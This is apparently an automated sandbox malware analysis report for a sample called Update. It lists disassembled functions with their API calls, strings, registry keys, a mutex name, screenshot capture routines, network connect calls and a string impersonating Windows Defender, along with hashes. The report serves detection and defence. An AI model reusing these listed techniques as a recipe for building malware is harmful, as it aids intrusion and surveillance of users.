WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E3D
gethostbyname.WS2_32(00000000), ref: 10002E4B
htons.WS2_32(?), ref: 10002E6D
connect.WS2_32(?,?,00000010), ref: 10002E8B

Strings

0u, xrefs: 10002EFC

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
String ID: 0u
API String ID: 640718063-3203441087
Opcode ID: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
Instruction ID: d5696d751933d4553be470da2890fc26df070c3c16b6f4ec0f7763c80930fe30
Opcode Fuzzy Hash: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
Instruction Fuzzy Hash: 136152B1A40304BFE710DFA4CC85FAAB7B9FF49711F104629F646AB2D0D7B1A9048B64

Function 037F6A70 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(75BF73E0), ref: 037F6A94
wsprintfW.USER32 ref: 037F6AA7

Part of subcall function 037F6910: GetCurrentProcessId.KERNEL32(4EB10097,00000000,00000000,75BF73E0,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F6938
Part of subcall function 037F6910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F6947
Part of subcall function 037F6910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F6960
Part of subcall function 037F6910: CloseHandle.KERNEL32(00000000,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F696B

_memset.LIBCMT ref: 037F6AC2
GetVersionExW.KERNEL32(?), ref: 037F6ADB
GetCurrentProcess.KERNEL32(00000008,?), ref: 037F6B12
OpenProcessToken.ADVAPI32(00000000), ref: 037F6B19
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 037F6B3F
GetLastError.KERNEL32 ref: 037F6B49
LocalAlloc.KERNEL32(00000040,?), ref: 037F6B5D
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 037F6B85
GetSidSubAuthorityCount.ADVAPI32 ref: 037F6B98
GetSidSubAuthority.ADVAPI32(00000000), ref: 037F6BA6
LocalFree.KERNEL32(?), ref: 037F6BB5
CloseHandle.KERNEL32(?), ref: 037F6BC2
wsprintfW.USER32 ref: 037F6C1B

Strings

None/%s, xrefs: 037F6BE7
-N/, xrefs: 037F6BEF
NO/, xrefs: 037F6BDF

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
String ID: -N/$NO/$None/%s
API String ID: 3036438616-3095023699
Opcode ID: f8fa4927da4128d3d9f484f948c4d55d98ce6b772c83efe20b02a67382812e00
Instruction ID: e57d0b84ecd04c5e27301c9db830c369d5ac3b658752aa259214d0fe647af8fe
Opcode Fuzzy Hash: f8fa4927da4128d3d9f484f948c4d55d98ce6b772c83efe20b02a67382812e00
Instruction Fuzzy Hash: D64180B0A00218AFDB20EBA4DC88FEEB7BCFB49710F0445D5E64596345DA34DA90CFA1

Function 037FAD10 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 346
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 037FAD53
RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 037FAD73

Strings

Console, xrefs: 037FAD39
IpDatespecial, xrefs: 037FAD6D
Console\0, xrefs: 037FB0DC
%s_bin, xrefs: 037FAE33

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: OpenQueryValue
String ID: %s_bin$Console$Console\0$IpDatespecial
API String ID: 4153817207-1338088003
Opcode ID: aa5fefa52fab436100ddaf02a84d80bed593db8cf53b453acf27fd7932347c85
Instruction ID: ad32f3a8f1c48588fbe716f03563a32b5e75fc2faae3fcbb3d2c5a2ed857e56a
Opcode Fuzzy Hash: aa5fefa52fab436100ddaf02a84d80bed593db8cf53b453acf27fd7932347c85
Instruction Fuzzy Hash: 25C1CFB5A003009FE710EF24DC45F6BB3E8BF94714F084668EA599B381E671E914CBA2

Function 037F6150 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 222
stringcomregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 037F618B
lstrcatW.KERNEL32(03821F10,0381510C,?,4EB10097,00000AD4,00000000,75BF73E0), ref: 037F61CD
lstrcatW.KERNEL32(03821F10,0381535C,?,4EB10097,00000AD4,00000000,75BF73E0), ref: 037F61D9
CoCreateInstance.OLE32(03812480,00000000,00000017,0381578C,?,?,4EB10097,00000AD4,00000000,75BF73E0), ref: 037F6220
_memset.LIBCMT ref: 037F62CE
wsprintfW.USER32 ref: 037F6336
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 037F635F
_memset.LIBCMT ref: 037F6376

Part of subcall function 037F6050: _memset.LIBCMT ref: 037F607C
Part of subcall function 037F6050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 037F6088

Strings

CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 037F6330
Windows Defender IOfficeAntiVirus implementation , xrefs: 037F6186, 037F61C8, 037F61D4, 037F63C9, 037F63D5, 037F6422, 037F6436, 037F645A

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
API String ID: 1221949200-1583895642
Opcode ID: faa2440ee7cc2a63d4949af17c291931a26da5a004b9c44fdfb0fc0105558647
Instruction ID: 5adddbb2ea87bfa844c07227a35de22fef64a2f50407c30569286692600c6844
Opcode Fuzzy Hash: faa2440ee7cc2a63d4949af17c291931a26da5a004b9c44fdfb0fc0105558647
Instruction Fuzzy Hash: 1D8161B1A00628AFDB20DB94CC45FAEB7BCEB89704F1445C8F719A7245D774AA80CF65

Function 037F5F40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 88
sleepstringsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32(00000000,00000000,2024.12.13), ref: 037F5F66
GetLastError.KERNEL32 ref: 037F5F6E
Sleep.KERNEL32(000003E8), ref: 037F5F85
CreateMutexW.KERNEL32(00000000,00000000,2024.12.13), ref: 037F5F90
GetLastError.KERNEL32 ref: 037F5F92
_memset.LIBCMT ref: 037F5FB9
lstrlenW.KERNEL32(?), ref: 037F5FC6
lstrcmpW.KERNEL32(?,03815328), ref: 037F5FED
Sleep.KERNEL32(000003E8), ref: 037F5FF8
GetModuleHandleW.KERNEL32(00000000), ref: 037F6005
GetConsoleWindow.KERNEL32 ref: 037F600F

Strings

key, xrefs: 037F5FD2
2024.12.13, xrefs: 037F5F5D, 037F5F87
open, xrefs: 037F5FCD

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
String ID: 2024.12.13$key$open
API String ID: 2922109467-2572726197
Opcode ID: 0526194d61d7a59109250190e074b3a53a55313583ad607e63f7a102414e211d
Instruction ID: b5ee2c52c7154a3001a2c55782b301d56c64b3df186f1f783ed5ed766a82e1a4
Opcode Fuzzy Hash: 0526194d61d7a59109250190e074b3a53a55313583ad607e63f7a102414e211d
Instruction Fuzzy Hash: 4021D372A447099FD624FBB4EC45F5EB39CEB84610F1409A9E7049B2C1EB70A509CBA3

Function 037F62B6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 037F62CE
wsprintfW.USER32 ref: 037F6336
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 037F635F
_memset.LIBCMT ref: 037F6376
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 037F63B2
lstrcatW.KERNEL32(03821F10,?), ref: 037F63CE
lstrcatW.KERNEL32(03821F10,0381535C), ref: 037F63DA
RegCloseKey.ADVAPI32(00000000), ref: 037F63E3
lstrlenW.KERNEL32(03821F10,?,4EB10097,00000AD4,00000000,75BF73E0), ref: 037F6427
lstrcatW.KERNEL32(03821F10,038153D4,?,4EB10097,00000AD4,00000000,75BF73E0), ref: 037F643B

Strings

CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 037F6330
Windows Defender IOfficeAntiVirus implementation , xrefs: 037F63C9, 037F63D5, 037F6422, 037F6436, 037F645A

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
API String ID: 1671694837-1583895642
Opcode ID: 627ce75ae380f67162fca75c5e6c41588b3004f9447f04761e281ab21ad9d105
Instruction ID: d1c33c584d1c2f36f53cdfd1b00036d79f60566bf74b5b0fa99f57c8e7504203
Opcode Fuzzy Hash: 627ce75ae380f67162fca75c5e6c41588b3004f9447f04761e281ab21ad9d105
Instruction Fuzzy Hash: 784183B1600668AFDB24DB94CC54FAEB7BCAF88705F1441C8F319A7281D6749B80CF65

Function 037F7490 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,037F5611,0000035E,000002FA), ref: 037F749C
GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 037F74B2
swprintf.LIBCMT ref: 037F74EF

Part of subcall function 037F7410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,037F7523), ref: 037F743D
Part of subcall function 037F7410: GetProcAddress.KERNEL32(00000000), ref: 037F7444
Part of subcall function 037F7410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,037F7523), ref: 037F7452

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 037F7547
RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 037F7563
RegCloseKey.KERNEL32(000002FA), ref: 037F7586
FreeLibrary.KERNEL32(00000000,?,?,?,037F5611,0000035E,000002FA), ref: 037F7598

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 037F753D
ProductName, xrefs: 037F755D
RtlGetNtVersionNumbers, xrefs: 037F74AC
%d.%d.%d, xrefs: 037F74E7
ntdll.dll, xrefs: 037F7497

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
API String ID: 2158625971-3190923360
Opcode ID: 4d0da07049bb65de7906537f385989f4890357b82fa0896f2dd05031a1d5dd63
Instruction ID: ae7f60112b9be380a2f49061de47250a841f89f49e69e7841c145502d2c9b3da
Opcode Fuzzy Hash: 4d0da07049bb65de7906537f385989f4890357b82fa0896f2dd05031a1d5dd63
Instruction Fuzzy Hash: 58319375A00308BFD718EBA4DC45EBF7BBCEB48740F140559BB05E6245EA74DA00C760

Function 6CA98A70 Relevance: 19.8, APIs: 9, Strings: 2, Instructions: 539comCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?), ref: 6CA98CD2
SHGetFolderPathA.SHELL32 ref: 6CA98CEF
_strlen.LIBCMT ref: 6CA98D13
GetFileAttributesA.KERNEL32(?), ref: 6CA99092
CoInitialize.OLE32(00000000), ref: 6CA990A3
CoCreateInstance.OLE32(6CABF3C0,00000000,00000001,6CABEC50,?), ref: 6CA990BB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104), ref: 6CA990EA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104), ref: 6CA99139
CoUninitialize.COMBASE ref: 6CA9915D

Strings

\, xrefs: 6CA98AED
e\, xrefs: 6CA98AC2

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: AttributesByteCharFileMultiWide$CreateFolderInitializeInstancePathUninitialize_strlen
String ID: \$e\
API String ID: 1074249417-3851158279
Opcode ID: 38da3285b16c6fdbde2d740dfabb20b1e63aafd9fe2cb90c1746e11b3f2291b5
Instruction ID: 67a892c1c00faa15401bc64ab613169eadc23add07a539dec0195a149de0d074
Opcode Fuzzy Hash: 38da3285b16c6fdbde2d740dfabb20b1e63aafd9fe2cb90c1746e11b3f2291b5
Instruction Fuzzy Hash: BF32EF71D142188FDB24CF68C9897AEBBF1BF45304F148699E419AB690DB319EC8CF91

Function 037FC060 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000002,?,4EB10097,?,00000000,?), ref: 037FC09E
GlobalLock.KERNEL32(00000000), ref: 037FC0AA
GlobalUnlock.KERNEL32(00000000), ref: 037FC0BF
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 037FC0D5
EnterCriticalSection.KERNEL32(0381FB64), ref: 037FC113
LeaveCriticalSection.KERNEL32(0381FB64), ref: 037FC124

Part of subcall function 037F9DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 037F9E04
Part of subcall function 037F9DE0: GdipDisposeImage.GDIPLUS(?), ref: 037F9E18

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 037FC14C

Part of subcall function 037FA460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 037FA48D
Part of subcall function 037FA460: _free.LIBCMT ref: 037FA503

GetHGlobalFromStream.OLE32(?,?), ref: 037FC16D
GlobalLock.KERNEL32(?), ref: 037FC177
GlobalFree.KERNEL32(00000000), ref: 037FC18F

Part of subcall function 037F9BA0: DeleteObject.GDI32(?), ref: 037F9BD2
Part of subcall function 037F9BA0: EnterCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9BE3
Part of subcall function 037F9BA0: EnterCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9BF8
Part of subcall function 037F9BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,037F9B7B), ref: 037F9C04
Part of subcall function 037F9BA0: LeaveCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9C15
Part of subcall function 037F9BA0: LeaveCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9C1C

GlobalSize.KERNEL32(00000000), ref: 037FC1A5
GlobalUnlock.KERNEL32(?), ref: 037FC221
GlobalFree.KERNEL32(00000000), ref: 037FC249

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
String ID:
API String ID: 1483550337-0
Opcode ID: 29192fc120f8c2df2d8a231c6284196db64e3ddb28c6d0e1b7bd46b0ed321344
Instruction ID: 6875a894c2c1b164d394524e174f4f47550a7212382434b45921105fe43951bc
Opcode Fuzzy Hash: 29192fc120f8c2df2d8a231c6284196db64e3ddb28c6d0e1b7bd46b0ed321344
Instruction Fuzzy Hash: A46128B5D00219AFCB10EFE8D88899EBBB8FF49710F104569E625A7341DB34A901CF50

Function 6CA99B10 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 353threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA993E0: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6CA9941E
Part of subcall function 6CA993E0: _strlen.LIBCMT ref: 6CA9943A

_strlen.LIBCMT ref: 6CA99B62
_strlen.LIBCMT ref: 6CA99CD0
CreateThread.KERNEL32(00000000,00000000,6CA98770,6CACC338,00000000,00000000), ref: 6CA99E21
CreateThread.KERNEL32(00000000,00000000,6CA980E0,00000000,00000000,00000000), ref: 6CA99E36
WaitForSingleObject.KERNEL32(00000000,00011170), ref: 6CA99E48
CloseHandle.KERNEL32(00000000), ref: 6CA99E56
CreateThread.KERNEL32(00000000,00000000,6CA92090,00000000,00000000,00000000), ref: 6CA99F65

Strings

Update.d, xrefs: 6CA99EF5, 6CA99EFE
IiViS, xrefs: 6CA99B5E, 6CA99B61
dll, xrefs: 6CA99EB3
Update.d, xrefs: 6CA99F87

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: CreateThread_strlen$CloseFileHandleModuleNameObjectSingleWait
String ID: IiViS$Update.d$Update.d$dll
API String ID: 632893256-1826472805
Opcode ID: e17a40a0d196cccc39a5dcf834a0ffc1747dcfa1bad47f68e6cad15058582d28
Instruction ID: 32d1bc56822e6e6be771d864fb77fe6160d7303fbc4eb7b4777fa9f10f066ff6
Opcode Fuzzy Hash: e17a40a0d196cccc39a5dcf834a0ffc1747dcfa1bad47f68e6cad15058582d28
Instruction Fuzzy Hash: D3D115B2D10208AFDB14DFB8DD867EEB7F5AF44304F148528E419A7780E7759A88CB91

Function 037F6490 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 037F64C2
RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 037F64E2
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 037F6524
_memset.LIBCMT ref: 037F6560
_memset.LIBCMT ref: 037F658E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 037F65BA
lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 037F65C3
lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 037F65D5
RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 037F6625
lstrlenW.KERNEL32(?), ref: 037F6635

Strings

Software\Tencent\Plugin\VAS, xrefs: 037F64D8

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
String ID: Software\Tencent\Plugin\VAS
API String ID: 2921034913-3343197220
Opcode ID: adf37bae46440abb1102809172ac3b6dd58a67fa109fd32e7b277aae7fc7fba0
Instruction ID: 9b7f2cd12459d2cfab9644578141d4bf32b32555d78c49565dfe7b4853249b26
Opcode Fuzzy Hash: adf37bae46440abb1102809172ac3b6dd58a67fa109fd32e7b277aae7fc7fba0
Instruction Fuzzy Hash: DA4179F5A40218AFDB24DB94CD85FEAB37DEB44700F0045D9F709B7185EA70AA858F64

Function 037FA460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 037FA48D
_malloc.LIBCMT ref: 037FA4D1
_free.LIBCMT ref: 037FA503
GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 037FA522
GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 037FA594
GdipDisposeImage.GDIPLUS(00000000), ref: 037FA59F
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 037FA5C5
GdipDisposeImage.GDIPLUS(00000000), ref: 037FA5DD

Strings

&, xrefs: 037FA579

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
String ID: &
API String ID: 2794124522-3042966939
Opcode ID: 456ab7cb3bb9e0fdba0be2d6e013818bcf81444e8102d0f77ad3d8b07f4668e9
Instruction ID: a73610f34b7740c6ff2d80ca241304291af0cc6333c674c02c783b458ee34895
Opcode Fuzzy Hash: 456ab7cb3bb9e0fdba0be2d6e013818bcf81444e8102d0f77ad3d8b07f4668e9
Instruction Fuzzy Hash: D95143B5A006199FDB44DFA4C848AFEB7B8FF48710F048559EA19AB350D734A905CFA1

Function 100052B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrysleepCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
RegCloseKey.KERNEL32(?), ref: 100053BB
OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
Sleep.KERNEL32(00000BB8), ref: 10005434

Strings

SOFTWARE, xrefs: 10005378
IpDates_info, xrefs: 1000538C, 100053AA

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: OpenProcessValue$CloseCodeDeleteExitSleep
String ID: IpDates_info$SOFTWARE
API String ID: 864241144-2243437601
Opcode ID: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
Instruction ID: c351098f3a10662c2abe80f3babca39824d4604c0415f8e3891e9891bb32f169
Opcode Fuzzy Hash: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
Instruction Fuzzy Hash: 184146316442819FF310CF308C45F6B7BB5FB453C6F994068E581CA186D3B2EA42C7A2

Function 100052D9 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84registrysleepCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
RegCloseKey.KERNEL32(?), ref: 100053BB
OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
Sleep.KERNEL32(00000BB8), ref: 10005434

Strings

SOFTWARE, xrefs: 10005378
IpDates_info, xrefs: 1000538C, 100053AA

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: OpenProcessValue$CloseCodeDeleteExitSleep
String ID: IpDates_info$SOFTWARE
API String ID: 864241144-2243437601
Opcode ID: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
Instruction ID: f7f7705b5b84b7b191dcdb77494346d14e222b8940c5b100b936b40375e1b217
Opcode Fuzzy Hash: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
Instruction Fuzzy Hash: B731C1306443819FF315CF308848B6B7BF6FB493C6F9944A8F5859A146D3B2DA46C761

Function 6CA98000 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6CA99F53,Update.d), ref: 6CA98017
